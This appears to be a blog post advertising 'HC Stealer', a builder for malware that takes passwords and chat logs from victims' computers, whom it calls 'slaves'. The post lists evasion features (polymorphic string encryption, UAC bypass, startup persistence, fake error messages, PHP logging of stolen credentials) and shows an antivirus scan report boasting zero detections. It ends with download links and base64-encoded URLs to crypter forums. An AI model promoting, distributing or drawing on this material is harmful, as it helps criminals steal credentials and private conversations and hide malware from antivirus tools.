> Awesome Password Stealers working with latest versions.
>Emails ChatLog Stealers. Now steal conversations from your slaves.
- MSN Chat Log Stealer
- Skype Chat Log Stealer
- Yahoo Chat Log Stealer
- Digsby ChatLog Stealer
> Generates Unique output everytime.
> Encryption on your sensitive details.
> Polymorphic Encryption on Strings and variables to keep it fud for longer. (Not fud anymore but you can use a crypter)
> Uses Dynamic API's with polymorphic encryption, which gets difficult for AVs to tag codes as virus.
> Codedom Based. No use of Stubs.
> Melt File.
> Add to Startup. You only need this feature if you want to check for updated passwords everyday on slave's computer.
> Small Server size.
> NO File is dropped, in the temporary folders to arouse suspicion.
> Icon Changer.
> Built in Assembly Editor to change info of server. If not used HCStealer randomizes assembly info itself.
> Spawn Fake Error.
> Building a Server has never been easier than this. Designed to build servers for the most naive users.
> Requires .net framework 2.0 which is available in most PCs.
> Complete UAC Bypass.
> PHP Logging, uses database to store all your fetched passwords.
> Tested and 100% working on Windows 7, XP. 32 bit and 64 bit.
>Emails ChatLog Stealers. Now steal conversations from your slaves.
- MSN Chat Log Stealer
- Skype Chat Log Stealer
- Yahoo Chat Log Stealer
- Digsby ChatLog Stealer
> Generates Unique output everytime.
> Encryption on your sensitive details.
> Polymorphic Encryption on Strings and variables to keep it fud for longer. (Not fud anymore but you can use a crypter)
> Uses Dynamic API's with polymorphic encryption, which gets difficult for AVs to tag codes as virus.
> Codedom Based. No use of Stubs.
> Melt File.
> Add to Startup. You only need this feature if you want to check for updated passwords everyday on slave's computer.
> Small Server size.
> NO File is dropped, in the temporary folders to arouse suspicion.
> Icon Changer.
> Built in Assembly Editor to change info of server. If not used HCStealer randomizes assembly info itself.
> Spawn Fake Error.
> Building a Server has never been easier than this. Designed to build servers for the most naive users.
> Requires .net framework 2.0 which is available in most PCs.
> Complete UAC Bypass.
> PHP Logging, uses database to store all your fetched passwords.
> Tested and 100% working on Windows 7, XP. 32 bit and 64 bit.
Report date: 2012-02-09 09:26:40 (GMT 1)
File name: hc-stealer-exe
File size: 1593344 bytes
MD5 Hash: 1eef869fc6a5a0aa4a5602e3100b085d
SHA1 Hash: 8b5b545f83f98c2a8a37365f759591d2127896a6
Detection rate: 0 on 9 (0%)
Status: CLEAN
Detections
Avast -
AVG -
Avira AntiVir -
ClamAV -
Comodo -
Emsisoft -
F-Prot -
Ikarus -
TrendMicro -
Download HC_Stealer + Tutorial
Download 1
Download 2
Crypters FUD
aHR0cCUzQS8vZm9yby51ZHRvb2xzLm5ldC9mb3J1bWRpc3BsYX kucGhwJTNGMzgtQ3J5cHRlcnM=
aHR0cCUzQS8vd3d3LmluZGV0ZWN0YWJsZXMubmV0L3ZpZXdmb3 J1bS5waHAlM0ZmJTNENw==
Niciun comentariu:
Trimiteți un comentariu